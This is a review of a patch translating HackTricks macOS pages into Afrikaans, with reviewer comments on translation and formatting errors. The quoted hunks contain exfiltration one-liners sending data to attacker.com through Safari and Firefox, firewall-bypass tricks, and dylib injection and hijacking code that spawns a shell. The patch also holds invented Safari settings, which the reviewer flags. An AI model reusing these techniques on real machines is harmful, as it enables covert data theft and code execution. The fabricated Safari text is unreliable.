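Review bot: this is the mirror of the previous problem: `-{% code overflow="wrap" %}` is removed before the block-syntax example while the `{% endcode %}` after `NSLog(@"3+4 = %d", suma(3,4));` remains as unchanged context, leaving an orphan closing tag; either keep the opening tag or drop both. In the prose, "sodat hulle aan funksies kan word oorgedra of in **arrays** of **woordeboeke** kan word **gestoor**" has the verb cluster in the wrong order; "sodat hulle aan funksies oorgedra of in **arrays** of **woordeboeke** gestoor kan word" is natural Afrikaans. The `blockName`, `suma`, `myLogger` and `genericLogger` bodies lose their indentation like the earlier hunks.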
@@ -345,35 +369,33 @@ NSFileManager *fileManager = [NSFileManager defaultManager]; // Check if file exists: if ([fileManager fileExistsAtPath:@"/path/to/file.txt" ] == YES) { - NSLog (@"File exists"); +NSLog (@"File exists"); } // copy files if ([fileManager copyItemAtPath: @"/path/to/file1.txt" toPath: @"/path/to/file2.txt" error:nil] == YES) { - NSLog (@"Copy successful"); +NSLog (@"Copy successful"); } // Check if the content of 2 files match if ([fileManager contentsEqualAtPath:@"/path/to/file1.txt" andPath:@"/path/to/file2.txt"] == YES) { - NSLog (@"File contents match"); +NSLog (@"File contents match"); } // Delete file if ([fileManager removeItemAtPath:@"/path/to/file1.txt" error:nil]) { - NSLog(@"Removed successfully"); +NSLog(@"Removed successfully"); } ``` {% endcode %} -It's also possible to manage files **using `NSURL` objects instead of `NSString`** objects. The method names are similar, but **with `URL` instead of `Path`**. - +Dit is ook moontlik om lêers te bestuur **deur gebruik te maak van `NSURL`-voorwerpe in plaas van `NSString`-voorwerpe**. Die metode name is soortgelyk, maar **met `URL` in plaas van `Path`**. ```objectivec NSURL *fileSrc = [NSURL fileURLWithPath:@"/path/to/file1.txt"]; NSURL *fileDst = [NSURL fileURLWithPath:@"/path/to/file2.txt"]; [fileManager moveItemAtURL:fileSrc toURL:fileDst error: nil]; ``` - -Most basic classes has a method `writeToFile: atomically: encoding: error:nil` defined that allows them to be directly be written to a file: +Die meeste basiese klasse het 'n metode `writeToFile: atomically: encoding: error:nil` wat dit moontlik maak om hulle direk na 'n lêer te skryf: {% code overflow="wrap" %} ```objectivec @@ -384,14 +406,14 @@ NSString* tmp = @"something temporary";
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
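Review bot: the sponsor banner, which is identical in every file, is translated differently each time it appears in this patch: "hacking-truuks" here and in macos-dyld-hijacking-and-dyld_insert_libraries.md, "hacktruuks" in the top banner of macos-bypassing-firewalls.md and in macos-defensive-apps.md, "haktruuks" in the bottom banner of macos-bypassing-firewalls.md; "github-opslagplekke", "github-repos", "GitHub-opslagplekke" and "github-repositoriums" for "github repos"; "swag" in most places but "HackTricks-uitrusting" once. Translate the banner once and paste the same text into every file so later banner updates can be applied mechanically. The `NSFileManager` example in the preceding hunk also has its `NSLog` lines de-indented and should be left as context.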
diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-bypassing-firewalls.md b/macos-hardening/macos-security-and-privilege-escalation/macos-bypassing-firewalls.md index 8f416f72e..49afd662b 100644 --- a/macos-hardening/macos-security-and-privilege-escalation/macos-bypassing-firewalls.md +++ b/macos-hardening/macos-security-and-privilege-escalation/macos-bypassing-firewalls.md @@ -1,70 +1,66 @@ -# macOS Bypassing Firewalls +# macOS Deurloophardeware
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-## Found techniques +## Gevonde tegnieke -The following techniques were found working in some macOS firewall apps. +Die volgende tegnieke is gevind om te werk in sommige macOS-firewalltoepassings. -### Abusing whitelist names +### Misbruik van witlysname -* For example calling the malware with names of well known macOS processes like **`launchd`** +* Byvoorbeeld om die kwaadwillige sagteware te noem met name van bekende macOS-prosesse soos **`launchd`** -### Synthetic Click +### Sintetiese Klik -* If the firewall ask for permission to the user make the malware **click on allow** +* As die firewall toestemming van die gebruiker vra, laat die kwaadwillige sagteware **klik op toelaat** -### **Use Apple signed binaries** +### **Gebruik Apple-ondertekende binaêre lêers** -* Like **`curl`**, but also others like **`whois`** +* Soos **`curl`**, maar ook ander soos **`whois`** -### Well known apple domains +### Bekende Apple-domeine -The firewall could be allowing connections to well known apple domains such as **`apple.com`** or **`icloud.com`**. And iCloud could be used as a C2. +Die firewall kan verbinding met bekende Apple-domeine soos **`apple.com`** of **`icloud.com`** toelaat. En iCloud kan as 'n C2 gebruik word. -### Generic Bypass +### Generiese Deurloop -Some ideas to try to bypass firewalls +Sommige idees om deur firewalls te loop -### Check allowed traffic - -Knowing the allowed traffic will help you identify potentially whitelisted domains or which applications are allowed to access them +### Kontroleer toegelate verkeer +Om die toegelate verkeer te ken, sal jou help om potensieel witlys-domeine te identifiseer of watter toepassings toegelaat word om daarmee te kommunikeer ```bash lsof -i TCP -sTCP:ESTABLISHED ``` +### Misbruik van DNS -### Abusing DNS - -DNS resolutions are done via **`mdnsreponder`** signed application which will probably vi allowed to contact DNS servers. 
+DNS-oplossings word gedoen deur die **`mdnsreponder`** ondertekende toepassing wat waarskynlik toegelaat sal word om kontak te maak met DNS-bedieners.
https://www.youtube.com/watch?v=UlT5KFTMn2k
-### Via Browser apps +### Via Blaaier-toepassings * **oascript** - ```applescript tell application "Safari" - run - tell application "Finder" to set visible of process "Safari" to false - make new document - set the URL of document 1 to "https://attacker.com?data=data%20to%20exfil +run +tell application "Finder" to set visible of process "Safari" to false +make new document +set the URL of document 1 to "https://attacker.com?data=data%20to%20exfil end tell ``` - * Google Chrome {% code overflow="wrap" %} 
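Review bot: `# macOS Deurloophardeware` is a mistranslation of "Bypassing Firewalls" ("Deurloophardeware" reads as pass-through hardware); the same file later translates "bypass" correctly as "omseil" ("kan jy die vuurmuurbeveiliging omseil"), so use `# macOS Omseiling van Vuurmure`, `### Generiese omseiling` and "Sommige idees om vuurmure te omseil" instead of `### Generiese Deurloop` and "om deur firewalls te loop". The hunk also alternates between "firewall" and "vuurmuur" for the same word; pick one. The AppleScript body under `tell application "Safari"` loses its indentation like the Objective-C blocks. Since the `mdnsreponder` sentence is being rewritten anyway, the daemon's actual name is `mDNSResponder`; the source typo can be fixed on the same line.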
@@ -74,39 +70,57 @@ end tell {% endcode %} * Firefox - ```bash firefox-bin --headless "https://attacker.com?data=data%20to%20exfil" ``` +# Safari -* Safari +Safari is 'n webblaaier wat standaard op macOS geïnstalleer is. Dit kan gebruik word om webwerwe te besoek en aanlyninhoud te sien. Hier is 'n paar nuttige wenke en truuks om Safari te gebruik: +- **Bladsyvertaling**: Safari het 'n ingeboude vertalingsfunksie wat jou kan help om webbladsye in 'n ander taal te vertaal. Klik eenvoudig op die vertalingsknoppie in die adresbalk en kies die gewenste taal. + +- **Bladsy-eksklusie**: As jy nie wil hê dat 'n sekere webbladsy vertaal moet word nie, kan jy dit uitsluit van die vertalingsproses. Klik op die vertalingsknoppie en kies "Uitsluit hierdie bladsy" om die vertaling te verhoed. + +- **Bladsyvertaling uitskakel**: As jy nie die vertalingsfunksie in Safari wil gebruik nie, kan jy dit uitskakel. Gaan na Safari-voorkeure, klik op die "Weergawe" -bladsy en skakel die "Vertalingsfunksie" af. + +- **Bladsy-eksklusie ongedaan maak**: As jy 'n webbladsy uitgesluit het van vertaling en jy wil dit weer insluit, klik op die vertalingsknoppie en kies "Sluit hierdie bladsy in". + +- **Bladsyvertalingstale**: Jy kan die voorkeurvertalingstale in Safari instel. Gaan na Safari-voorkeure, klik op die "Weergawe" -bladsy en kies die gewenste tale in die "Vertalingsfunksie" -afdeling. + +- **Bladsyvertalingstale prioriteite**: As jy wil hê dat Safari sekere tale voor ander vertaal, kan jy die prioriteite van die vertalingstale instel. Gaan na Safari-voorkeure, klik op die "Weergawe" -bladsy en rangskik die tale in die "Vertalingsfunksie" -afdeling volgens jou voorkeur. + +- **Bladsyvertaling uitskakel vir 'n spesifieke webwerf**: As jy nie wil hê dat Safari 'n spesifieke webwerf vertaal nie, kan jy dit uitskakel. Klik op die vertalingsknoppie terwyl jy op die webwerf is en kies "Uitsluit hierdie webwerf". 
+ +- **Bladsyvertaling uitskakel vir alle webwerwe**: As jy nie wil hê dat Safari enige webwerf vertaal nie, kan jy dit uitskakel. Gaan na Safari-voorkeure, klik op die "Weergawe" -bladsy en skakel die "Vertalingsfunksie" af. + +- **Bladsyvertaling uitskakel vir 'n spesifieke taal**: As jy nie wil hê dat Safari 'n spesifieke taal vertaal nie, kan jy dit uitskakel. Gaan na Safari-voorkeure, klik op die "Weergawe" -bladsy en skakel die betrokke taal af in die "Vertalingsfunksie" -afdeling. + +- **Bladsyvertaling uitskakel vir 'n spesifieke webwerf en taal**: As jy nie wil hê dat Safari 'n spesifieke webwerf en taal vertaal nie, kan jy dit uitskakel. Klik op die vertalingsknoppie terwyl jy op die webwerf is en kies "Uitsluit hierdie webwerf en taal". ```bash open -j -a Safari "https://attacker.com?data=data%20to%20exfil" ``` +### Via prosesinjeksies -### Via processes injections - -If you can **inject code into a process** that is allowed to connect to any server you could bypass the firewall protections: +As jy **kode kan inspuit in 'n proses** wat toegelaat word om met enige bediener te verbind, kan jy die vuurmuurbeveiliging omseil: {% content-ref url="macos-proces-abuse/" %} [macos-proces-abuse](macos-proces-abuse/) {% endcontent-ref %} -## References +## Verwysings * [https://www.youtube.com/watch?v=UlT5KFTMn2k](https://www.youtube.com/watch?v=UlT5KFTMn2k)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repositoriums.
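Review bot: `-* Safari` is replaced by a top-level `# Safari` heading followed by about twenty bullets on Safari's page-translation settings, none of which exist in the English source and none of which concern firewall bypass; this is generated filler and it also breaks the heading hierarchy (an H1 in the middle of a page whose sections are `##` and `###`). Restore the `* Safari` list item and the blank line before the `open -j -a Safari` fence. `### Via prosesinjeksies` should use the same rendering of "injection" as macos-defensive-apps.md in this patch (`Prosessinspuiting`); choose one term across the files.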
diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-defensive-apps.md b/macos-hardening/macos-security-and-privilege-escalation/macos-defensive-apps.md index ac2fbd018..df9847a99 100644 --- a/macos-hardening/macos-security-and-privilege-escalation/macos-defensive-apps.md +++ b/macos-hardening/macos-security-and-privilege-escalation/macos-defensive-apps.md @@ -1,55 +1,55 @@ -# macOS Defensive Apps +# macOS Verdedigingsprogramme
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
-## Firewalls +## Vuurmuur -* [**Little Snitch**](https://www.obdev.at/products/littlesnitch/index.html): It will monitor every connection made by each process. Depending on the mode (silent allow connections, silent deny connection and alert) it will **show you an alert** every time a new connection is stablished. It also has a very nice GUI to see all this information. -* [**LuLu**](https://objective-see.org/products/lulu.html): Objective-See firewall. This is a basic firewall that will alert you for suspicious connections (it has a GUI but it isn't as fancy as the one of Little Snitch). +* [**Little Snitch**](https://www.obdev.at/products/littlesnitch/index.html): Dit sal elke verbinding wat deur elke proses gemaak word, monitor. Afhangende van die modus (stil toelaat van verbindinge, stil ontkenning van verbindinge en waarskuwing), sal dit **'n waarskuwing wys** elke keer as 'n nuwe verbinding tot stand gebring word. Dit het ook 'n baie mooi GUI om al hierdie inligting te sien. +* [**LuLu**](https://objective-see.org/products/lulu.html): Objective-See-vuurmuur. Dit is 'n basiese vuurmuur wat jou sal waarsku vir verdagte verbindinge (dit het 'n GUI, maar dit is nie so luuks soos dié van Little Snitch nie). -## Persistence detection +## Volharding opsporing -* [**KnockKnock**](https://objective-see.org/products/knockknock.html): Objective-See application that will search in several locations where **malware could be persisting** (it's a one-shot tool, not a monitoring service). -* [**BlockBlock**](https://objective-see.org/products/blockblock.html): Like KnockKnock by monitoring processes that generate persistence. +* [**KnockKnock**](https://objective-see.org/products/knockknock.html): Objective-See-toepassing wat sal soek na verskeie plekke waar **malware volharding kan hê** (dit is 'n eenmalige instrument, nie 'n moniteringsdiens nie). 
+* [**BlockBlock**](https://objective-see.org/products/blockblock.html): Soos KnockKnock deur prosesse te monitor wat volharding genereer. -## Keyloggers detection +## Sleutelloggers opsporing -* [**ReiKey**](https://objective-see.org/products/reikey.html): Objective-See application to find **keyloggers** that install keyboard "event taps" +* [**ReiKey**](https://objective-see.org/products/reikey.html): Objective-See-toepassing om **sleutelloggers** op te spoor wat sleutelbord "gebeurtenis-aftastings" installeer. -## Ransomware detection +## Ransomware opsporing -* [**RansomWhere**](https://objective-see.org/products/ransomwhere.html): Objective-See application to detect **file encryption** actions. +* [**RansomWhere**](https://objective-see.org/products/ransomwhere.html): Objective-See-toepassing om **lêerversleuteling**-aksies op te spoor. -## Mic & Webcam detection +## Mikrofoon & Webkamera opsporing -* [**OverSight**](https://objective-see.org/products/oversight.html): Objective-See application to detect **application that starts using webcam and mic.** +* [**OverSight**](https://objective-see.org/products/oversight.html): Objective-See-toepassing om **toepassings wat die webkamera en mikrofoon begin gebruik** op te spoor. -## Process Injection detection +## Prosessinspuiting opsporing -* [**Shield**](https://theevilbit.github.io/shield/): Applicaiton that **detects different process injection** techniques. +* [**Shield**](https://theevilbit.github.io/shield/): Toepassing wat **verskillende prosessinspuitingstegnieke opspoor**.
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
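Review bot: `## Vuurmuur` is singular for "Firewalls" while the section lists two products; `## Vuurmure`. The other headings keep the English word order ("Volharding opsporing", "Sleutelloggers opsporing", "Ransomware opsporing", "Mikrofoon & Webkamera opsporing", "Prosessinspuiting opsporing"); in Afrikaans these are either compounds (`Volhardingsopsporing`) or "Opsporing van ..." phrases. In the ReiKey line, "event taps" names a macOS mechanism (CGEventTap) and is better left in English in quotes than rendered as "gebeurtenis-aftastings", which a reader cannot search for.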
diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-dyld-hijacking-and-dyld_insert_libraries.md b/macos-hardening/macos-security-and-privilege-escalation/macos-dyld-hijacking-and-dyld_insert_libraries.md index 444104441..ce7329661 100644 --- a/macos-hardening/macos-security-and-privilege-escalation/macos-dyld-hijacking-and-dyld_insert_libraries.md +++ b/macos-hardening/macos-security-and-privilege-escalation/macos-dyld-hijacking-and-dyld_insert_libraries.md @@ -2,22 +2,21 @@
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
-## DYLD\_INSERT\_LIBRARIES Basic example - -**Library to inject** to execute a shell: +## DYLD\_INSERT\_LIBRARIES Basiese voorbeeld +**Biblioteek om in te spuit** om 'n skul te voer: ```c // gcc -dynamiclib -o inject.dylib inject.c @@ -29,35 +28,30 @@ __attribute__((constructor)) void myconstructor(int argc, const char **argv) { - syslog(LOG_ERR, "[+] dylib injected in %s\n", argv[0]); - printf("[+] dylib injected in %s\n", argv[0]); - execv("/bin/bash", 0); - //system("cp -r ~/Library/Messages/ /tmp/Messages/"); +syslog(LOG_ERR, "[+] dylib injected in %s\n", argv[0]); +printf("[+] dylib injected in %s\n", argv[0]); +execv("/bin/bash", 0); +//system("cp -r ~/Library/Messages/ /tmp/Messages/"); } ``` - -Binary to attack: - +Binêre teiken: ```c // gcc hello.c -o hello #include int main() { - printf("Hello, World!\n"); - return 0; +printf("Hello, World!\n"); +return 0; } ``` - -Injection: - +Injeksie: ```bash DYLD_INSERT_LIBRARIES=inject.dylib ./hello ``` +## Dyld Hijacking Voorbeeld -## Dyld Hijacking Example - -The targeted vulnerable binary is `/Applications/VulnDyld.app/Contents/Resources/lib/binary`. +Die teiken kwesbare binêre lêer is `/Applications/VulnDyld.app/Contents/Resources/lib/binary`. {% tabs %} {% tab title="entitlements" %} @@ -71,13 +65,13 @@ The targeted vulnerable binary is `/Applications/VulnDyld.app/Contents/Resources ```bash # Check where are the @rpath locations otool -l "/Applications/VulnDyld.app/Contents/Resources/lib/binary" | grep LC_RPATH -A 2 - cmd LC_RPATH - cmdsize 32 - path @loader_path/. (offset 12) +cmd LC_RPATH +cmdsize 32 +path @loader_path/. (offset 12) -- - cmd LC_RPATH - cmdsize 32 - path @loader_path/../lib2 (offset 12) +cmd LC_RPATH +cmdsize 32 +path @loader_path/../lib2 (offset 12) ``` {% endcode %} {% endtab %} 
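Review bot: "om 'n skul te voer" is not Afrikaans for "to execute a shell"; keep the technical term and write "om 'n shell uit te voer". `Binêre teiken` (binary target) reverses "Binary to attack"; "Binêre lêer om aan te val" keeps the meaning. In the `LC_RPATH` tab the `otool` output lines are rewritten without their leading spaces (`+cmd LC_RPATH`, `+cmdsize 32`, `+path @loader_path/. (offset 12)`), so the listing no longer matches what the tool prints; command output should never be part of a translation diff, and the same applies to the `myconstructor` and `main` bodies in the two C examples.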
@@ -87,9 +81,9 @@ otool -l "/Applications/VulnDyld.app/Contents/Resources/lib/binary" | grep LC_RP ```bash # Check librareis loaded using @rapth and the used versions otool -l "/Applications/VulnDyld.app/Contents/Resources/lib/binary" | grep "@rpath" -A 3 - name @rpath/lib.dylib (offset 24) - time stamp 2 Thu Jan 1 01:00:02 1970 - current version 1.0.0 +name @rpath/lib.dylib (offset 24) +time stamp 2 Thu Jan 1 01:00:02 1970 +current version 1.0.0 compatibility version 1.0.0 # Check the versions ``` @@ -97,13 +91,12 @@ compatibility version 1.0.0 {% endtab %} {% endtabs %} -With the previous info we know that it's **not checking the signature of the loaded libraries** and it's **trying to load a library from**: +Met die vorige inligting weet ons dat dit **nie die handtekening van die gelaai biblioteke nagaan nie** en dit probeer 'n biblioteek laai vanaf: * `/Applications/VulnDyld.app/Contents/Resources/lib/lib.dylib` * `/Applications/VulnDyld.app/Contents/Resources/lib2/lib.dylib` -However, the first one doesn't exist: - +Maar, die eerste een bestaan nie: ```bash pwd /Applications/VulnDyld.app @@ -111,8 +104,7 @@ pwd find ./ -name lib.dylib ./Contents/Resources/lib2/lib.dylib ``` - -So, it's possible to hijack it! Create a library that **executes some arbitrary code and exports the same functionalities** as the legit library by reexporting it. And remember to compile it with the expected versions: +So, dit is moontlik om dit te kap! Skep 'n biblioteek wat **willekeurige kode uitvoer en dieselfde funksionaliteit uitvoer** as die regte biblioteek deur dit weer uit te voer. En onthou om dit te kompileer met die verwagte weergawes: {% code title="lib.m" %} ```objectivec 
@@ -120,12 +112,12 @@ So, it's possible to hijack it! Create a library that **executes some arbitrary __attribute__((constructor)) void custom(int argc, const char **argv) { - NSLog(@"[+] dylib hijacked in %s", argv[0]); +NSLog(@"[+] dylib hijacked in %s", argv[0]); } ``` {% endcode %} -Compile it: +Kompileer dit: {% code overflow="wrap" %} ```bash @@ -134,28 +126,28 @@ gcc -dynamiclib -current_version 1.0 -compatibility_version 1.0 -framework Found ``` {% endcode %} -The reexport path created in the library is relative to the loader, lets change it for an absolute path to the library to export: +Die heruitvoerpad wat in die biblioteek geskep word, is relatief tot die laaier. Laat ons dit verander na 'n absolute pad na die biblioteek wat uitgevoer moet word: {% code overflow="wrap" %} ```bash #Check relative otool -l /tmp/lib.dylib| grep REEXPORT -A 2 - cmd LC_REEXPORT_DYLIB - cmdsize 48 - name @rpath/libjli.dylib (offset 24) +cmd LC_REEXPORT_DYLIB +cmdsize 48 +name @rpath/libjli.dylib (offset 24) #Change the location of the library absolute to absolute path install_name_tool -change @rpath/lib.dylib "/Applications/VulnDyld.app/Contents/Resources/lib2/lib.dylib" /tmp/lib.dylib # Check again otool -l /tmp/lib.dylib| grep REEXPORT -A 2 - cmd LC_REEXPORT_DYLIB - cmdsize 128 - name /Applications/Burp Suite Professional.app/Contents/Resources/jre.bundle/Contents/Home/lib/libjli.dylib (offset 24) +cmd LC_REEXPORT_DYLIB +cmdsize 128 +name /Applications/Burp Suite Professional.app/Contents/Resources/jre.bundle/Contents/Home/lib/libjli.dylib (offset 24) ``` {% endcode %} -Finally just copy it 